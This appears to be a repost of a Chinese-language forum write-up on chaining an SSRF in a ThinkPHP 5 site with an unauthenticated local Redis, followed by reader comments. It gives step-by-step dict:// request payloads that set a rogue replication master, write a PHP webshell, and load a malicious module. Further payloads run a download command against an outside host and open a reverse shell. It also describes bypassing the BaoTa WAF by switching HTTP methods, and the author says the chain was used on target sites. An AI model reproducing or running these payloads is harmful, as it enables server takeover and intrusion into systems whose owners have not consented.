通过 SSRF 操作 Redis 主从复制写 Webshell
十篇想看的文章中就有八篇是这样的。 真鸡儿烦人,连续签到了差不多一年还是这样,没办法只能先水上去了。
自己转载自己公开的文章应该不会被 ban 吧?
Author : R3start and 曲云杰
2020年4月1日19:57:37
废话
说起来很巧,这篇文章早就写完了,当时写完的时候并没有发出去,因为本想着等曲老板的其他东西一起,结果第二天发现安恒他们发了一篇差不多的文章,看样子源码几乎是一致或者大部分相似的,当时真的觉得太巧了,安全圈是真的小,2333333 不过能见识到大家不同方面的思考和渗透思路, 还是觉得是挺有意思的,于是将这篇文章部分内容发出来,一起学习交流一下。
这篇文章可能会比较啰嗦,因为我会把我踩过的坑都写上,最后才会写成功的操作。
起因
连麦搞域搞的头发昏的时候遇到了问题,在群里提问经几位大佬慷慨指点后准备撤退继续肝,却被曲老板逮住了我这个失踪人口,经曲老板一顿指点和教育后说,空了帮忙看套 TP5 二开的程序,目前审出来了几个问题:任意文件读取 、SSRF、还有一个反序列化。但是反序列化还在研究,让我帮忙看看 SSRF 能不能利用 ,还特意提了一下网站依赖 Redis 运行,无密码,绑定在 127.0.0.1。我嘴上说着不要,我要学习,手里却不老实的点了进去...(先上源码、先上源码)
SSRF 的点是没有做任何过滤,经典的 SSRF 漏洞代码
起了一个 NC , 测试一下支持的协议,随手测试一下相对熟悉的 dict 协议发现支持,而且知道目标的 curl 版本是 7.64.1,那就好办了。
不过还是按照老规矩,还是先把这个 SSRF 支持的协议,属于什么类型摸清楚。
经测试发现还支持:http、https、gopher、telnet 等协议。
SSRF 的类型为无状态型 SSRF ,即不管你请求的端口是否开放、协议是否支持、网站是否能访问 返回的状态都是一样的,你无法通过它扫描端口开放情况和使用 file 协议读取本地信息。
不支持 302 跳转。
踩坑
由于系统是曲老板自己搭建的,redis 运行权限底,无法写定时任务和私钥,而且要求最好只写 webshell 。
所以首先使用 DICT 协议随手往跟目录写出了一个文本,查看版本和压缩情况。
1.使用 DICT 协议添加一条测试记录
/api/test/http_get?url=dict://127.0.0.1:6379/set:xxxxxxxxxxxxxxxxxx:1111111111111
2.设置保存路径
/api/test/http_get?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/
3.设置保存文件名
/api/test/http_get?url=dict://127.0.0.1:6379/config:set:dbfilename:1.txt
4.保存
/api/test/http_get?url=dict://127.0.0.1:6379/save
查看 1.txt 内容发现 redis 数据没有被压缩,版本为 5.0.8
我们都天真的以为游戏结束了,可当我尝试写于 <?php phpinfo();?> 发现 <>、"" 被实体编码了!!! ? 问号更是直接截断!
尝试使用双 url 编码,写入 Redis 后的数据是被解码一次后的 url 编码!失败了。
想起曾经在 DVP 被抓去出 CTF 题的时候,遇到过类似的场景 DVP_CTF_WEB_Writeup 。
于是使用的 unicode 编码,发现写入后依旧是 Unicode 编码后的数据,所以还是失败了!!
后续又测试了多种方式均未成功,人都快疯了!然后尝试使用 gopher 协议操作Redis ,但是测试发现 ,竟然无法操作目标 Redis 也无法通过 Gopher 协议触发 302 跳转,仅能单独的发送一个 gopher 协议请求 ,啥都干不了...
突然想到还有一位任意文件下载的漏洞
漏洞是 readfile 触发的应该支持 302 跳转,测试发现支持 302 跳转,但是只支持 http/s 协议,尝试使用 302 跳转,跳到支持 dict 协议的 SSRF 漏洞点再写一遍 ,(此时还是不死心,其实这跟我发送的 GET 请求毫无区别) 不过倒是可以利用这个点扫端口。
陷入了困境,虽然写文章的时候没几句话,但是尝试了 N 种方式都没有绕过简直快疯掉,不想搞的时候,想等曲老板的反序列化,结果他搞的反序列化一会说可以,一会说不行....真的是,我还等着看 payload 呢。
爬坑写出的时候发现是 redis 5.x 的版本,突然想起可能存在主从复制的 RCE 漏洞,但是它绑定在了 127.0.0.1 端口我们无法链接,所以也无法使用网上公开的各种脚本工具,但是大概看过代码或者了解过这个漏洞的应该都知道触发的关键原因,是通过主从的命令同步远端的恶意扩展然后编译出 .so 文件,然后加载触发。
突然闪过一个想法,那我是不是可以通过 SSRF 手动触发主从复制 RCE 的漏洞?看一下主从命令的解释:
有戏!,从属服务器会从主服务器同步数据!来重新审视一下我们的目的和遇到的问题。
最终的目的:往目标写一个 WEBSHELL
遇到的问题:关键符号被转移
我们知道通过 redis-cli 写入特殊字符在双引号里面是不会被转义的!所以我们可以尝试通过主从的模式写入webshell ,redis 主从 RCE 打的多了应该会发现和遇到很多奇奇怪怪的问题,有时候甚至会把 redis 打瘫掉!!! 所以不到万不得已,不建议直接打主从。
本地复现本地启动一个 redis ,服务器启动一个 redis
本地 redis 只有一个 test 键,值为 localhost
服务器 redis 新建了一个 phpshell 的键 值为 <?php phpinfo();?>
在本地 redis 设置远程服务器 redis 服务器为主服务器,同步远程服务器 redis 的内容
设置成功以后,即使当前没有任何数据,也无法写入任何数据也无所谓,因为这时本地的 redis 正在开始同步主 redis 的数据了
然后常规的设置路径和写出就行了
写出的 webshell 完整无损
通过靶机 SSRF 复现
1.连接远程主服务器
/api/test/http_get?url=dict://127.0.0.1:6379/slaveof:r3start.net:2323
2.设置保存路径
/api/test/http_get?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/
3.设置保存文件名
/api/test/http_get?url=dict://127.0.0.1:6379/config:set:dbfilename:test.php
4.保存
/api/test/http_get?url=dict://127.0.0.1:6379/save
完美,成功写出,突然感觉简单的一批,浪费我一天时间。
还有最后一步很重要!结束后要断开主从不然目标无法对 Redis 进行写操作 (可以设置写入)
5.断开主从
/api/test/http_get?url=dict://127.0.0.1:6379/slaveof:no:one
其实目标是 Redis 5.X 的完全可以通过 SSRF 手动复现主从复制 RCE 但是有一定的风险,所以并没有对目标操作,而选择写 Webshell 这个比较稳的方法。
通过 SSRF 触发 Redis 主从 RCE本地和靶机测试了半天都能花式 Getshell ,结果打目标的时候目标没有权限写 web 目录,只好使用这个风险较大的操作了。这里使用 SSRF 触发 Redis 主从 RCE 的时候使用了最简单、方便、快捷的方法。
手动转发先来看一下网上公开脚本的执行流程,代码很长,只看一段,脚本地址,大概就是连接主服务器,然后就是设置名字和导出再加载,至于本机是如何伪造恶意的主 redis 服务和载入恶意 so 文件 的代码则在前面,这里只是简单的手动转发,所以可以直接跳过。
更直观的方法,使用 NC 看此脚本做了什么。
python3 redis-rogue-server.py --rhost=自己VPS公网IP --rport=8789 --lhost=自己VPS公网IP --lport=8377
nc -lvp 8789
这就很明了了,最简单的利用方法,自己 nc 监听一个端口,然后使用脚本打自己的 nc 然后自己通过 SSRF 再目标上执行,每执行一次就在 nc 中回一次车就行了... 但不要太着急,必须要等到脚本有反应了再执行下一句命令,因为在导出 exp.so 时,脚本需要伪造恶意主服务端并加载 exp.so ,然后从服务器进行拉取需要点时间。如:
SSRF 触发主从反弹 shell
操作也是很平常的操作,如同你在 redis-cli 中操作一样
1.连接远程主服务器
/api/test/http_get?url=dict://127.0.0.1:6379/slaveof:r3start.net:8379
2.设置保存文件名
/api/test/http_get?url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so
3.载入 exp.so
/api/test/http_get?url=dict://127.0.0.1:6379/MODULE:LOAD:./exp.so
4.断开主从
/api/test/http_get?url=dict://127.0.0.1:6379/SLAVEOF:NO:ONE
5.恢复原始文件名
/api/test/http_get?url=dict://127.0.0.1:6379/config:set:dbfilename:dump.rdb
6.执行命令
/api/test/http_get?url=dict://127.0.0.1:6379/system.exec:'curl x.x.x.x/x'
7.反弹 shell
/api/test/http_get?url=dict://127.0.0.1:6379/system.rev:x.x.x.x:8887
打目标站完美复现
绕过宝塔 WAF 拦截反序列化 RCE
真尼玛是一波五六七八折,SSRF 调通了,曲老板那边的反序列化也调通了,结果他妈打另外几个目标发现存在宝塔???居然给拦截了 ,测试发现拦截了 dict 、phar 等触发漏洞的协议,拦截规则为 : 协议+ :/ 就拦截
思路一
通过在关键位置不断 fuzz 填充字符,寻找不影响正常运行的空字符,但又能绕过宝塔的规则,如:dict$x$://、dict:$x$//、dict$x$//、dict:$x$/、dict:$x$ 等位置不断填充编码尝试。
反正跑了上百万个包,跑到我 php 都崩溃掉了,也没跑出来,放弃。
思路二
通过协议绕过,因为目标是基于 Thinkphp 5.0.24 二开的,而且接收参数时使用 request
所以想着尝试遍历一波所有协议,看看有没有宝塔不拦截,但又能使用的协议。很幸运,还真有。
把 GET 参数使用 POST 方式传输,依旧被宝塔拦截
然后对请求协议进行爆破后发现 PUT 、DELETE 协议可以正常使用,而且宝塔不会拦截。于是就那么简单绕过了?
然后反序列化正常打
最终结果,反序列话打起来还真麻烦。
结束
奇奇怪怪的站搞多了就会发现,渗透就是一直让你不断掉坑里,你自己要不断的想办法爬出来并记住它,然后下次遇到直接绕过它的过程。
TCV:5 //上等级,看文章!冲冲冲~
评论47次
通过 SSRF 触发 Redis 主从 RCE,这波操作确实有点迷,迷的点在于 exp.so的导入。这个exp.so是之前打主从存留的,还是SSRF从redis客户端向服务端触发的,可能还需要一个新的环境来验证一下。从文章截图看,使用的是n0b0dyCN/redis-rogue-server来伪造redis服务端,这个server只运行一次并不会循环监听本地端口的,是否脚本也有了对应的改造,不然SSRF那边的redis客户端应该是连不上的。
主从模式对目标redis没啥影响吧,要是影响目标生产xi统也是很蛋疼
[-] Error:-ERR unknown command 'system.exec' , check your module! 加载不了so 是目标机权限问题吗 低权的怎么解啊 没有web权限
太酷了,这才是渗透!
师傅是真的强,主从模式是真没想到,只遇见过简单的ssrf+redis弹shell
通过 SSRF 触发 Redis 主从 RCE,这波操作确实有点迷,迷的点在于 exp.so的导入。 这个exp.so是之前打主从存留的,还是SSRF从redis客户端向服务端触发的,可能还需要一个新的环境来验证一下。 从文章截图看,使用的是n0b0dyCN/redis-rogue-server来伪造redis服务端,这个server只运行一次并不会循环监听本地端口的,是否脚本也有了对应的改造,不然SSRF那边的redis客户端应该是连不上的。
可惜没早点看到大佬的文章,进行学xi下
要是早点看到表哥的文章,玄武组的那道题目也不会卡住不动了
真的很厉害,学xi了
R3师傅的文章质量都很高啊,学xi了
很详细的记录
精品文章,高质量,r哥真是太强了
师傅都是高质量
MODULE:LOAD是真的骚,就是容易崩
我用两台内网机试了,exp so能直接打
这个应该是要redis 服务器可以出网吧。 现在遇到的站大部分都出不了网 xi望有机会可以讲讲反序列化
R3start牛逼嗷
这老哥思路很骚
主从复制应该是有相应的权限设置吧,写读分离的
大老远跑过来,就为了反序列细节,不知大佬还有没有续集?
学xi了,很好的文章.. 网上用的脚本的确打崩过redis...
r3师傅真强,又学xi了。这回直观的认识到ssrf咋打redis了